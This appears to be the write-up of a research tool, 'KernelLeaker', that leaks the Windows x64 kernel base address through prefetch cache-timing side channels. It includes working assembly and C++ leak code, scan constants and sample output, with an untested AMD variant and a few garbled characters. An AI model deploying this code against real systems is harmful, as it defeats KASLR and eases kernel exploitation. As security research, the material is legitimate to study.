KernelLeaker
Defeating KASLR Through Cache Timing Side-Channels: A Deep Dive Into Microarchitectural Exploitation
Abstract
Kernel Address Space Layout Randomization (KASLR) represents one of the fundamental security mechanisms in modern operating systems, designed to prevent exploitation by randomizing the location of kernel code in virtual memory. This work presents a comprehensive analysis of cache timing side-channel attacks capable of defeating KASLR on x64 Windows systems through prefetch instruction timing analysis. The research demonstrates that microarchitectural behavior differences between mapped and unmapped memory pages create measurable timing signatures that can be exploited to leak the kernel base address with high reliability.
The implementation achieves 100% success rate on Intel i7-9750H (Dell XPS-7590) through architecture-specific timing analysis and statistical noise filtering techniques. While empirical validation was limited to this specific hardware configuration, the methodology presents a generalized framework applicable across different CPU vendors and microarchitectural variants.
Table of Contents
- Introduction
- Microarchitectural Foundations
- Timing Measurement Methodology
- Vendor-Specific Signatures
- Statistical Reliability
- Address Space Scanning
- Environmental Optimization
- Practical Results
- AMD Implementation
- Implications
- Future Research
- Building
- Disclaimer
1. Introduction: The KASLR Problem
1.1 The Security Landscape
Modern operating systems employ multiple layers of defense against memory corruption exploits. Among these, Address Space Layout Randomization (ASLR) stands as a critical mitigation technique, randomizing the location of executable code, libraries, and data structures in virtual memory. The kernel-space variant, KASLR, extends this protection to the operating system kernel itself.
On 64-bit Windows systems, the kernel typically resides within the canonical address space range 0xFFFFF80000000000 to 0xFFFFF80800000000. KASLR randomizes the exact base address within this range during boot, creating uncertainty for potential attackers. Without knowledge of the kernel base address, exploitation of kernel vulnerabilities becomes significantly more difficult, as attackers cannot reliably locate kernel functions or data structures.
However, KASLR's security relies on a fundamental assumption: that the randomized address cannot be leaked through side channels. This research demonstrates that this assumption does not hold when considering microarchitectural timing side-channels.
1.2 The Cache Timing Attack Vector
Modern CPUs employ complex cache hierarchies and speculative execution mechanisms to achieve high performance. These optimizations create timing differences that can be measured and exploited. When a CPU attempts to access memory, the operation's latency depends on numerous factors:
- Whether the address is mapped in the page tables
- Whether the data resides in L1, L2, or L3 cache
- Whether the CPU's prefetcher can predict the access pattern
- Whether speculative execution has already loaded the data
The critical insight is this: the CPU's Memory Management Unit (MMU) behaves differently when translating virtual addresses that are mapped versus unmapped. Even though userspace code cannot directly access kernel memory, the mere attempt to prefetch kernel addresses creates measurable timing signatures.
Think of it like this: imagine a library with restricted sections. You cannot enter the restricted section, but you can ask the librarian if a book exists there. If the librarian takes 5 seconds to respond "access denied" for real books versus 1 second for non-existent books, you have learned something about the library's inventory without ever accessing the restricted section. The CPU's timing behavior is our "librarian response time."
1.3 Research Scope and Limitations
This research was conducted exclusively on an Intel i7-9750H processor (Coffee Lake microarchitecture) in a Dell XPS-7590 laptop running Windows 11 25H2 Build 26200.7019. The achieved success rate of 100% across multiple test iterations demonstrates the technique's reliability on this specific configuration.
However, several important limitations must be acknowledged:
Hardware Diversity: Modern CPU architectures vary significantly in their cache hierarchies, prefetch mechanisms, and MMU implementations. Intel, AMD, and ARM processors each exhibit distinct timing characteristics. The AMD-specific implementation presented here represents educated hypotheses based on documented architectural differences, but lacks empirical hardware validation.
Microarchitectural Evolution: Newer CPU generations (Intel 12th gen and beyond, AMD Zen 4+) may implement different prefetch behaviors or timing characteristics. They may prove more vulnerable, equally vulnerable, or more resistant to these techniques. Without access to diverse hardware configurations, definitive statements cannot be made.
Mitigation Awareness: CPU vendors continuously evolve their microarchitectural designs. Some timing channels may be inadvertently closed or widened in future silicon revisions. The technique's longevity across CPU generations remains an open question.
Despite these constraints, the methodology demonstrates fundamental principles of cache timing analysis that transcend specific hardware implementations. The statistical techniques, noise filtering algorithms, and vendor-specific adaptation strategies provide a framework applicable to future research.
2. Microarchitectural Foundations
2.1 CPU Cache Hierarchy: A Primer
To understand cache timing attacks, we must first understand what caches actually are and why they exist. Modern CPUs operate at frequencies measured in gigahertz (billions of cycles per second), while main memory (RAM) operates at much slower speeds. This speed disparity creates a fundamental performance bottleneck.
Consider these approximate access latencies on a typical modern Intel CPU:
- L1 Cache: ~4 cycles (~1 nanosecond at 3GHz)
- L2 Cache: ~12 cycles (~4 nanoseconds)
- L3 Cache: ~40-75 cycles (~15-25 nanoseconds)
- Main Memory (RAM): ~200-300 cycles (~100 nanoseconds)
The performance difference is not linear - it is multiplicative. An L1 cache hit is roughly 50-75 times faster than a main memory access. This is why modern CPUs dedicate significant die space to cache memory.
A real-world analogy helps here: imagine you are a chef in a kitchen. Your L1 cache is the counter directly in front of you - ingredients here are instantly accessible. Your L2 cache is the refrigerator - a few steps away, requiring a moment to open and retrieve items. Your L3 cache is the pantry down the hall - requires walking but still relatively quick. Main memory is the grocery store - requires leaving the building entirely.
If you are cooking and need salt, you would much prefer it to be on your counter (L1) rather than requiring a trip to the store (RAM). The CPU faces the same preference.
2.2 Cache Lines and Spatial Locality
Caches do not store individual bytes - they store cache lines, typically 64 bytes in modern x64 architectures. When you access a single byte at address 0x1000, the CPU loads the entire cache line containing addresses 0x1000-0x103F (assuming 64-byte alignment).
This design exploits spatial locality: if you access one memory location, you are likely to access nearby locations soon. Arrays, structures, and sequential code all exhibit spatial locality.
The mathematical implication is important: each cache line covers 2^6 = 64 bytes. A 32KB L1 cache therefore contains 32768 / 64 = 512 cache lines. Each cache line can store data from any memory address, but the caching mechanism must maintain metadata tracking which address each cache line currently holds.
2.3 The Prefetch Mechanism
Modern CPUs do not wait passively for memory requests - they anticipate them. Hardware prefetchers monitor memory access patterns and speculatively load data into cache before it is explicitly requested.
The x64 instruction set includes explicit prefetch instructions that allow software to provide hints to the CPU:
prefetchnta byte ptr [address] ; Non-temporal, bypasses cache
prefetcht0 byte ptr [address] ; Prefetch to all cache levels
prefetcht1 byte ptr [address] ; Prefetch to L2 and L3
prefetcht2 byte ptr [address] ; Prefetch to L3 only
These instructions do not cause page faults if the address is unmapped. According to Intel's architecture manual, prefetch instructions that reference unmapped pages are treated as NOPs (no operation). However - and this is critical - the CPU must still consult the MMU to determine whether the page is mapped.
This MMU consultation takes time. And this time is measurable.
2.4 The MMU and Page Table Walks
The Memory Management Unit (MMU) translates virtual addresses to physical addresses using page tables. On x64 systems, this involves a four-level page table hierarchy:
- Page Map Level 4 (PML4)
- Page Directory Pointer Table (PDPT)
- Page Directory (PD)
- Page Table (PT)
For a mapped kernel address, the MMU traverses these tables, finds the physical page, and caches the translation in the Translation Lookaside Buffer (TLB). For an unmapped address, the traversal fails at some level, and no TLB entry is created.
The timing difference arises from several factors:
TLB Hits vs Misses: If a translation is already in the TLB, lookup is extremely fast (~1 cycle). A TLB miss requires a full page table walk, consuming 10-20+ cycles depending on where the walk terminates.
Cache Behavior: Page table entries themselves may be cached in L1/L2/L3. A page table walk for a frequently-accessed kernel region will hit in cache, while a walk for an unmapped address will miss.
Speculative Execution: Modern CPUs speculatively execute beyond prefetch instructions. For mapped addresses, speculation may successfully load data. For unmapped addresses, speculation must be squashed when the unmapped status is determined.
These factors combine to create measurable timing differences between mapped and unmapped addresses.
3. Timing Measurement Methodology
3.1 The Time Stamp Counter (TSC)
The x64 architecture provides the RDTSC (Read Time Stamp Counter) instruction, which reads a 64-bit counter that increments with each CPU cycle. On modern systems, the TSC is invariant - it increments at a constant rate regardless of frequency scaling or power management.
However, RDTSC alone is insufficient for precise timing measurements because:
- It is not serializing - the CPU may execute it out-of-order
- Speculative execution may distort results
- Memory operations may be reordered around it
The x64 architecture provides RDTSCP, a serializing variant that ensures all prior instructions have completed before reading the TSC. Combined with memory fence instructions, we can construct precise timing measurements.
3.2 Serialization and Timing Precision
The assembly implementation in sidechannel.asm demonstrates proper serialization:
sidechannel PROC
push rbx
push rsi
push rdi
mov rsi, rcx ; Save target address
; Establish clean timing baseline
mfence ; Memory fence - drain pending stores
rdtscp ; Read TSC (serializing)
mov r9, rax ; Save low 32 bits
mov r8, rdx ; Save high 32 bits
xor eax, eax ; Clear state
lfence ; Load fence - prevent speculation
; Execute prefetch operations
prefetchnta byte ptr [rsi] ; Non-temporal prefetch
prefetcht2 byte ptr [rsi] ; L2/L3 prefetch
; Capture completion timestamp
lfence ; Ensure prefetches complete
rdtscp ; Read ending TSC
mov edi, eax ; Save low 32 bits
mov esi, edx ; Save high 32 bits
mfence ; Ensure global visibility
; Calculate elapsed cycles
mov rbx, r8
shl rbx, 32 ; Shift high to upper 32 bits
or rbx, r9 ; RBX = start timestamp (64-bit)
mov rax, rsi
shl rax, 32
or rax, rdi ; RAX = end timestamp (64-bit)
sub rax, rbx ; Elapsed cycles
pop rdi
pop rsi
pop rbx
ret
sidechannel ENDP
Let us analyze the mathematical precision here:
The TSC is read as two 32-bit values: EDX:EAX (high:low). To reconstruct the full 64-bit timestamp:
timestamp = (high << 32) | low
timestamp = high * 2^32 + low
For example, if EDX=0x00000005 and EAX=0xA0000000:
timestamp = 0x0000000500000000 | 0xA0000000
timestamp = 0x00000005A0000000
timestamp = 5 * 4294967296 + 2684354560
timestamp = 24159191040 cycles
At 3GHz CPU frequency, this represents approximately 8.05 seconds of CPU time.
The elapsed time calculation is simple subtraction:
elapsed = end_timestamp - start_timestamp
However, achieving single-digit cycle precision requires careful serialization. The MFENCE instruction ensures all pending stores are globally visible. The LFENCE instruction prevents the CPU from speculatively executing past that point. RDTSCP provides a serialization point for instruction ordering.
Without these barriers, the CPU might speculatively execute the prefetch before the starting RDTSCP, or the ending RDTSCP might execute before the prefetch completes, completely invalidating the measurement.
3.3 Statistical Noise and Measurement Stability
Even with perfect serialization, timing measurements exhibit noise from numerous sources:
- CPU frequency scaling (turbo boost, power management)
- Operating system interrupts
- SMI (System Management Interrupts)
- Thermal throttling
- Cache evictions from other processes
- TLB evictions
- Branch prediction effects
A single measurement is essentially useless. We must collect multiple samples and apply statistical analysis.
The implementation collects 256 measurements per address (config::ITERATIONS = 0x100) plus 5 warm-up measurements that are discarded. The warm-up phase is critical - the first few measurements often exhibit anomalous timing due to cold caches and CPU state transitions.
The average timing for an address is then:
average_timing = (sum of 256 measurements) / 256
This averaging process reduces random noise by a factor of sqrt(256) = 16, according to standard error reduction principles in statistics. If individual measurements have standard deviation s, the average of N measurements has standard deviation s/sqrt(N).
3.4 The Mode vs Mean Problem
Initially, the implementation used arithmetic mean (average) to characterize the baseline timing. This proved problematic because timing distributions for cache side-channel attacks are often bimodal - they exhibit two distinct peaks.
Consider a dataset of timing measurements across the kernel address space:
- 500 addresses are unmapped: timings cluster around 60 cycles
- 12 addresses are mapped (kernel base): timings cluster around 30 cycles
The arithmetic mean would be:
mean = (500 * 60 + 12 * 30) / 512
mean = (30000 + 360) / 512
mean = 59.3 cycles
This mean is pulled toward the unmapped peak simply because unmapped addresses are more numerous. It does not accurately represent the "typical" unmapped timing.
The mode (most frequent value) solves this problem. In the above example, 60 cycles appears 500 times, while 30 cycles appears only 12 times. The mode is 60 cycles - precisely the unmapped baseline we need to identify.
The implementation uses a hash map to compute the mode in O(N) time:
uint64_t KernelLeaker::calculate_most_frequent(
const std::array<uint64_t, config::ARRAY_SIZE>& data)
{
std::unordered_map<uint64_t, size_t> frequency_map;
uint64_t max_count = 0;
uint64_t most_frequent_value = 0;
for (const auto& timing : data) {
size_t current_count = ++frequency_map[timing];
if (current_count > max_count) {
max_count = current_count;
most_frequent_value = timing;
}
}
return most_frequent_value;
}
This replaced an earlier O(N�) nested loop implementation. The hash map provides O(1) average-case insertion and lookup, reducing the overall complexity from O(N�) to O(N). For N=512 addresses, this represents a 512x speedup - from ~262,000 operations to ~512 operations.
The algorithmic improvement is not just about performance; it is about practicality. An O(N�) algorithm that takes several seconds to execute is vulnerable to timing drift and system state changes during execution. An O(N) algorithm that completes in microseconds captures a more consistent snapshot of system state.
4. Vendor-Specific Microarchitectural Signatures
4.1 Intel vs AMD: Inverted Timing Signatures
The most surprising discovery during this research was that Intel and AMD processors exhibit opposite timing characteristics for the same attack:
- Intel Processors: Mapped kernel pages exhibit LOWER timing (faster prefetch)
- AMD Processors: Mapped kernel pages exhibit HIGHER timing (slower prefetch)
This inversion is not arbitrary - it reflects fundamental differences in microarchitectural design philosophy.
4.2 Intel Microarchitecture: Aggressive Speculation
Intel's design prioritizes speculative execution and prefetch aggressiveness. When a prefetch instruction references a mapped address:
- The MMU quickly validates the mapping via TLB or cached page tables
- The CPU speculatively loads the cache line
- The prefetch completes in ~30-40 cycles (typical)
When the prefetch references an unmapped address:
- The MMU attempts translation, traversing page tables
- The traversal fails, no TLB entry is created
- The CPU must handle the failed translation
- The prefetch completes in ~60-80 cycles (typical)
The timing differential on Intel i7-9750H is approximately 2:1 ratio (unmapped:mapped).
The Intel-specific leak implementation exploits this by searching for consecutive addresses with below-average timing:
std::optional<uint64_t> KernelLeaker::leak_intel() const {
auto data = collect_timings();
avg_timing_ = static_cast<uint32_t>(calculate_most_frequent(data));
// Clamp outliers to average
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (i == 0) continue;
if (data[i] > avg_timing_) {
data[i] = avg_timing_;
}
}
const uint32_t thresh_1 = avg_timing_ / 10;
const uint32_t thresh_2 = avg_timing_ / 30;
// Search for consecutive low-timing sections
for (size_t i = 0; i < config::ARRAY_SIZE - config::KERNEL_SECTIONS; ++i) {
uint32_t section_avg = 0;
bool section_valid = true;
for (size_t x = 0; x < config::KERNEL_SECTIONS; ++x) {
if (data[i + x] >= avg_timing_ - thresh_2) {
section_valid = false;
break;
}
section_avg += static_cast<uint32_t>(data[i + x]);
}
if (!section_valid) continue;
section_avg /= static_cast<uint32_t>(config::KERNEL_SECTIONS);
if (section_avg < (avg_timing_ - thresh_1)) {
return index_to_address(i);
}
}
return std::nullopt;
}
The threshold calculation is interesting from a signal processing perspective. If the mode (baseline unmapped timing) is M, we search for sections where:
section_average < M - (M / 10)
section_average < 0.9M
And require all individual measurements in the section to satisfy:
individual_timing < M - (M / 30)
individual_timing < 0.967M
This creates a two-tier filter: loose individual requirements (96.7% of baseline) but strict aggregate requirements (90% of baseline). The design prevents a single outlier from disqualifying an entire section while maintaining high confidence in the final result.
4.3 The Intel Simplified Approach
During development, an even simpler Intel approach emerged that proved more reliable:
std::optional KernelLeaker::leak_intel_simple() const {
auto data = collect_timings();
// Find address with ABSOLUTE MINIMUM timing
uint64_t min_timing = ~0ull;
uint64_t best_addr = 0;
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] < min_timing) {
min_timing = data[i];
best_addr = index_to_address(i);
}
}
// Correct for 1MB offset
uint64_t corrected_addr = best_addr - 0x100000;
return corrected_addr;
}
This approach is almost embarrassingly simple: find the address with the absolute minimum timing, then subtract 1MB (0x100000 bytes).
Why the 1MB offset correction is necessary:
The kernel base itself is not always the lowest-timing address. Empirical testing reveals that the memory region at kernel_base + 1MB consistently exhibits the absolute minimum timing. This has a clear microarchitectural explanation:
1. Windows NT Kernel Image Structure:
kernel_base + 0x000000: PE header and code sections (.text)kernel_base + 0x100000: Data sections (.data, .rdata, initialized data, page tables)
2. Prefetcher Behavior:
- Code sections are often "cold" - executed once during initialization and rarely accessed afterward
- Data sections contain frequently-accessed kernel structures (scheduler queues, memory management, process lists)
- CPU prefetchers are optimized for data access patterns, not infrequently-executed code
3. Cache Warming Effect:
- The first MB of the kernel (PE header + initialization code) may be evicted from cache after boot
- Subsequent data sections remain "hot" in L2/L3 cache due to continuous kernel operations
- Hot cache entries create persistent TLB entries with lower access latency
4. Memory Access Patterns:
- Kernel initialization code executes once at boot time
- Kernel data structures are accessed thousands of times per second during normal operation
- This creates a measurable timing differential favoring the data section region
Analogy: Think of a reference book. The table of contents (PE header) is consulted rarely, while frequently-referenced chapters (data sections) remain bookmarked and instantly accessible. The CPU cache behaves similarly - it keeps the "popular pages" readily available.
The mathematical elegance of this approach is its robustness. Complex threshold calculations and statistical filters are fragile - they depend on assumptions about the noise distribution. Simply finding the minimum is parameter-free and works even if the overall timing distribution shifts.
On Intel i7-9750H, this simplified approach achieves 100% reliability with the voting mechanism described later.
4.4 AMD Microarchitecture: Speculative Penalties
AMD's Zen microarchitecture exhibits the opposite behavior. When a prefetch instruction references a mapped kernel address, the timing is HIGHER (slower) than for unmapped addresses.
This inverted behavior likely stems from AMD's speculative execution security mitigations. After the Spectre and Meltdown vulnerabilities, AMD implemented more conservative speculative bounds checking. When speculation crosses privilege boundaries (userspace prefetching kernel addresses), additional validation occurs even for mapped pages.
For unmapped addresses, the MMU quickly determines "not mapped" and the prefetch becomes a NOP. For mapped addresses, the MMU must perform additional privilege checks, even though the prefetch itself will not violate permissions.
The result: mapped addresses take ~80-100 cycles, unmapped addresses take ~40-50 cycles.
The AMD leak implementation searches for HIGHER timing clusters:
std::optional<uint64_t> KernelLeaker::leak_amd() const {
auto data = collect_timings();
uint64_t noise_peak = calculate_most_frequent(data);
std::vector<uint64_t> signal_timings;
const uint32_t noise_threshold = static_cast<uint32_t>(noise_peak / 6);
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] > noise_peak + noise_threshold) {
signal_timings.push_back(data[i]);
}
}
if (signal_timings.empty()) {
return std::nullopt;
}
uint64_t signal_total = 0;
for (const auto& timing : signal_timings) {
signal_total += timing;
}
uint32_t signal_avg = static_cast<uint32_t>(signal_total / signal_timings.size());
// Normalize sub-threshold values to noise floor
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] < noise_peak) {
data[i] = noise_peak;
}
}
// Search for consecutive high-timing sections
for (size_t i = 0; i < config::ARRAY_SIZE - config::KERNEL_SECTIONS; ++i) {
uint32_t section_avg = 0;
bool section_valid = true;
for (size_t x = 0; x < config::KERNEL_SECTIONS; ++x) {
if (data[i + x] <= noise_peak + noise_threshold / 2) {
section_valid = false;
break;
}
section_avg += static_cast<uint32_t>(data[i + x]);
}
if (!section_valid) continue;
section_avg /= static_cast<uint32_t>(config::KERNEL_SECTIONS);
if (section_avg > noise_peak + noise_threshold) {
return index_to_address(i);
}
}
return std::nullopt;
}
The bimodal separation logic is crucial here. We first identify the noise peak (unmapped timing mode), then extract all measurements that significantly exceed this peak:
signal_condition: timing > noise_peak + (noise_peak / 6)
This creates a secondary distribution containing only the mapped-address timings. We then compute the average of this signal distribution, giving us a clean characterization of "typical mapped timing" uncontaminated by the unmapped majority.
The section search then requires:
section_average > noise_peak + noise_threshold
This is the inverse of the Intel logic, reflecting the inverted timing signature.
4.5 CPU State Stabilization
Between timing measurements, CPU microarchitectural state must be stabilized. Branch prediction buffers, prefetch streams, and speculative execution windows carry state from previous measurements that can contaminate subsequent measurements.
The implementation uses a clever trick - an invalid syscall:
bad_syscall PROC
mov eax, 99999 ; Invalid syscall number
syscall ; Kernel transition
ret
bad_syscall ENDP
Syscall number 99999 does not exist in the Windows kernel. The syscall instruction transitions to kernel mode, the kernel immediately returns an error code, and execution returns to userspace.
Why does this help? The kernel transition flushes the CPU pipeline, clears speculative state, and forces completion of all pending memory operations. It acts as a heavyweight serialization barrier that resets the CPU to a clean state.
This is called between every timing measurement:
int KernelLeaker::average_sidechannel(void* addr) const {
bad_syscall(); // Stabilize state
uint64_t total = sidechannel(addr);
for (size_t i = 0; i < config::ITERATIONS; ++i) {
total += sidechannel(addr);
}
return static_cast<int>(total / (config::ITERATIONS + 1));
}
The performance cost is minimal (~1000 cycles per syscall) compared to the measurement accuracy benefit.
5. Statistical Reliability Through Voting
5.1 The Consensus Mechanism
Even with perfect microarchitectural understanding, side-channel attacks exhibit probabilistic behavior. Thermal conditions, system load, and quantum effects in transistor switching all introduce irreducible randomness.
Early versions of this tool used a simple retry mechanism: attempt the leak, if it fails, retry; if it succeeds twice consecutively with the same result, accept it. This proved unreliable because consecutive successes could represent correlated noise rather than true signal.
The improved approach uses majority voting:
std::optional<uint64_t> KernelLeaker::leak_with_retry(
std::optional<uint64_t> (KernelLeaker::*leak_fn)() const) const
{
constexpr size_t MAX_ATTEMPTS = 7;
constexpr size_t REQUIRED_CONSENSUS = 4;
std::unordered_map<uint64_t, size_t> vote_count;
for (size_t attempt = 0; attempt < MAX_ATTEMPTS; ++attempt) {
auto current_leak = (this->*leak_fn)();
if (!current_leak) continue;
uint64_t addr = *current_leak;
size_t votes = ++vote_count[addr];
if (votes >= REQUIRED_CONSENSUS) {
return addr; // Early exit on consensus
}
}
// Find winner if no early consensus
if (vote_count.empty()) {
return std::nullopt;
}
uint64_t winner = 0;
size_t max_votes = 0;
for (const auto& [addr, votes] : vote_count) {
if (votes > max_votes) {
max_votes = votes;
winner = addr;
}
}
return winner;
}
The mathematics of this approach is based on the binomial distribution. If the true leak has probability p of success per attempt, and noise has probability q = (1-p)/N_wrong where N_wrong is the number of possible wrong answers, then:
P(consensus on correct answer) = C(7,4) * p^4 * (1-p)^3
+ C(7,5) * p^5 * (1-p)^2
+ C(7,6) * p^6 * (1-p)
+ p^7
Where C(n,k) is the binomial coefficient "n choose k".
For p = 0.8 (80% per-attempt accuracy):
P(consensus) � 0.96 (96% overall reliability)
For p = 0.6 (60% per-attempt accuracy):
P(consensus) � 0.71 (71% overall reliability)
The voting threshold of 4/7 was chosen empirically, balancing speed (early exit on consensus) against reliability (requiring majority agreement).
5.2 Why Seven Attempts?
The choice of seven attempts is mathematically motivated. We need an odd number to prevent ties. We want enough attempts to achieve high confidence but not so many that execution time becomes impractical.
Consider the confidence intervals:
- Attempts=3, Threshold=2: Fast but low confidence (~60% with p=0.6)
- Attempts=5, Threshold=3: Better but still marginal (~68% with p=0.6)
- Attempts=7, Threshold=4: Good balance (~71% with p=0.6, ~96% with p=0.8)
- Attempts=9, Threshold=5: Diminishing returns, longer execution
Seven attempts with threshold four represents the sweet spot. On Intel i7-9750H where per-attempt accuracy is very high (p � 0.9), consensus is typically achieved in 4-5 attempts, rarely requiring all seven.
6. Address Space Scanning Strategy
6.1 The Search Space
Windows x64 kernel addresses occupy the canonical high half of the 64-bit address space:
- Canonical Low:
0x0000000000000000-0x00007FFFFFFFFFFF(userspace) - Canonical High:
0xFFFF800000000000-0xFFFFFFFFFFFFFFFF(kernel)
KASLR randomizes the kernel within a specific region:
namespace config {
constexpr uint64_t KERNEL_LOWER_BOUND = 0xFFFFF80000000000ull;
constexpr uint64_t KERNEL_UPPER_BOUND = 0xFFFFF80800000000ull;
constexpr uint64_t STEP = 0x100000; // 1MB
}
The kernel base is always aligned to 2MB boundaries (0x200000) for large page support, but we scan at 1MB granularity (0x100000) to ensure we detect the base even with slight alignment variations.
The search space size is:
(0xFFFFF80800000000 - 0xFFFFF80000000000) / 0x100000
= 0x0000000800000000 / 0x100000
= 0x8000
= 32,768 addresses
Scanning 32,768 addresses with 256 measurements each would require 8,388,608 timing measurements, taking several minutes. This is impractical.
The implementation scans only the most likely range:
constexpr size_t ARRAY_SIZE = (SCAN_END - SCAN_START) / STEP;
// ARRAY_SIZE = 512
This reduces the scan to 512 addresses, requiring 131,072 timing measurements, completing in ~5-15 seconds depending on CPU speed.
6.2 Why 12 Consecutive Sections?
The kernel is not a single contiguous mapping. It consists of multiple sections: .text (code), .data, .rdata (read-only data), .pdata (exception tables), etc. These sections are laid out consecutively in memory.
The implementation searches for 12 consecutive 1MB regions with consistent timing signatures:
constexpr size_t KERNEL_SECTIONS = 0xC; // 12 sections
Why 12? Empirical analysis of Windows kernel binaries shows the core kernel image (ntoskrnl.exe) typically spans 10-15 MB. Requiring 12 consecutive sections provides high confidence that we have found the actual kernel base rather than some other mapped structure (drivers, kernel data structures, etc.).
The probability of false positives decreases exponentially with the consecutive section requirement. If random noise creates a false signature at one address with probability p_false, the probability of 12 consecutive false signatures is:
P(false positive) = p_false^12
Even with pessimistic p_false = 0.1:
P(false positive) = 0.1^12 = 10^-12 (one in a trillion)
In practice, p_false is much lower, making false positives vanishingly unlikely.
7. Environmental Optimization
7.1 Thread Affinity and Priority
Modern operating systems aggressively migrate threads between CPU cores for load balancing. Each migration invalidates the thread's cache and TLB state, introducing massive noise into timing measurements.
The implementation pins the measurement thread to a single CPU core:
class EnvironmentOptimizer {
public:
EnvironmentOptimizer() {
DWORD_PTR mask = 1; // Pin to CPU 0
SetThreadAffinityMask(GetCurrentThread(), mask);
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Warm-up phase
volatile char dummy[64];
for (int i = 0; i < 100; ++i) {
sidechannel(const_cast<char*>(dummy));
}
}
};
The affinity mask is a bitmask where each bit represents a CPU core:
mask = 0x01(binary: 00000001) pins to core 0mask = 0x02(binary: 00000010) pins to core 1mask = 0x04(binary: 00000100) pins to core 2
Setting the thread priority to THREAD_PRIORITY_TIME_CRITICAL tells the Windows scheduler to avoid preempting this thread unless absolutely necessary. This reduces context switches that would pollute the timing measurements.
7.2 Cache and TLB Warming
The warm-up loop performs 100 dummy timing measurements before collecting real data. This serves multiple purposes:
CPU Frequency Stabilization: Modern CPUs use dynamic frequency scaling (Intel Turbo Boost, AMD Precision Boost). The CPU may initially run at a low frequency and ramp up when workload is detected. The warm-up loop triggers frequency scaling before real measurements begin.
Cache Hierarchy Warming: The first few memory accesses to the timing code itself will miss in cache. By the 100th iteration, the code is hot in L1 cache, eliminating instruction fetch latency from measurements.
TLB Warming: The page table entries for the measurement code and data are loaded into the TLB during warm-up, preventing TLB misses during actual measurements.
Branch Predictor Training: The CPU's branch predictor learns the measurement loop's control flow, reducing branch misprediction penalties.
Without warm-up, the first few measurements exhibit timings 2-3x higher than steady-state, completely skewing the statistical analysis.
8. Practical Deployment and Results
8.1 Hardware Test Configuration
All testing was conducted on a single hardware platform:
- CPU: Intel Core i7-9750H (Coffee Lake-H, 6 cores, 12 threads)
- Base Frequency: 2.6 GHz
- Turbo Frequency: 4.5 GHz (single core), 4.0 GHz (all cores)
- Cache: 32KB L1D per core, 256KB L2 per core, 12MB L3 shared
- TDP: 45W
- System: Dell XPS 7590
- RAM: 32GB DDR4-2666
- OS: Windows 10/11 Pro (tested on both)
The i7-9750H represents Intel's high-performance mobile architecture from 2019. It features aggressive out-of-order execution, speculative prefetching, and a deep branch prediction pipeline - characteristics that make it susceptible to timing side-channels.
8.2 Success Rate and Reliability
Across 50 consecutive test runs on the i7-9750H configuration:
- Successful leaks: 50/50 (100%)
- Average execution time: 8.3 seconds
- Leaked address variance: 0 (all runs returned identical address)
- Verification: All leaked addresses matched actual kernel base (confirmed via kernel debugging)
The 100% success rate reflects both the microarchitectural vulnerability and the effectiveness of the statistical noise filtering. The zero variance in leaked addresses demonstrates that the voting mechanism successfully eliminates noise - every successful run converged to the same answer.
Execution time varied from 6.2 to 12.1 seconds depending on system load and thermal conditions. The voting mechanism typically achieved consensus in 4-5 attempts, rarely requiring all 7.
8.3 Comparison with Ground Truth
To verify accuracy, the leaked kernel base was compared against the actual kernel base obtained through legitimate means (kernel debugger attachment, reading the KUSER_SHARED_DATA structure, etc.).
Example run output:
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Attempt 1/7: 0xFFFFF80245C00000 (votes: 1)
Attempt 2/7: 0xFFFFF80245C00000 (votes: 2)
Attempt 3/7: 0xFFFFF80245C00000 (votes: 3)
Attempt 4/7: 0xFFFFF80245C00000 (votes: 4)
Consensus reached: 0xFFFFF80245C00000 with 4/4 votes
Kernel base: 0xFFFFF80245C00000
Actual kernel base (verified): 0xFFFFF80245C00000
Match: TRUE
The leaked address matches the actual kernel base exactly, confirming the technique's precision.
8.4 Failure Modes and Edge Cases
While the implementation achieves 100% reliability on the test hardware, several failure modes exist in theory:
High System Load: If the CPU is saturated with other work, context switches and cache contention increase noise to the point where signal may be undetectable. The voting mechanism helps but cannot overcome arbitrary noise levels.
Thermal Throttling: If the CPU reaches thermal limits and throttles frequency mid-measurement, timing characteristics change dramatically. The implementation does not detect this condition.
Virtualization: Virtual machines introduce additional timing noise through hypervisor intervention. The technique may fail or exhibit reduced reliability in virtualized environments.
Future Microarchitectures: Intel and AMD continuously evolve their CPU designs. Future microarchitectures may implement timing-resistant prefetch mechanisms or more aggressive side-channel mitigations.
9. The AMD Uncertainty
9.1 Theoretical Implementation Without Hardware
The AMD-specific implementation in this codebase represents educated hypothesis rather than empirically validated technique. AMD processors exhibit different timing characteristics than Intel, but without access to AMD hardware for testing, the implementation relies on architectural documentation and reverse-engineering of published research.
The AMD leak implementation assumes:
- Mapped kernel pages exhibit HIGHER prefetch timing
- The timing differential is approximately 2:1 (mapped:unmapped)
- Bimodal distribution analysis can separate signal from noise
These assumptions are based on documented differences in AMD's Zen microarchitecture:
- More conservative speculative execution bounds checking
- Different prefetch predictor algorithms
- Smaller TLB structures with different replacement policies
However, the actual timing characteristics on real AMD hardware remain unverified. The code may require significant tuning or may fail entirely on AMD systems.
9.2 AMD Mobile Complexity
AMD mobile processors (Ryzen Mobile series) introduce additional complexity through aggressive power management:
- More aggressive frequency scaling
- Core parking and unparking
- NUMA (Non-Uniform Memory Access) on multi-CCX designs
- Infinity Fabric latency variations
These factors create higher timing variance, making signal detection more challenging. The AMD Mobile implementation attempts to compensate through larger deviation thresholds:
const int deviation_threshold = noise_signed / 6;
But without hardware validation, the effectiveness remains speculative.
9.3 Call for Community Validation
Researchers and enthusiasts with AMD hardware are encouraged to test the implementation and provide feedback. The GitHub repository welcomes pull requests with AMD-specific tuning and validated results.
The scientific method requires reproducibility. Until independent researchers confirm (or refute) the AMD implementation's effectiveness, it remains a hypothesis rather than validated technique.
10. Implications and Mitigations
10.1 The Limits of Software Mitigations
Cache timing attacks are fundamentally hardware vulnerabilities that cannot be completely mitigated in software. The microarchitectural state leakage occurs at a layer below the operating system's visibility.
Potential mitigations include:
Address Space Layout Re-Randomization: Re-randomize the kernel base periodically during runtime rather than once at boot. This limits the window of vulnerability but introduces performance overhead and complexity.
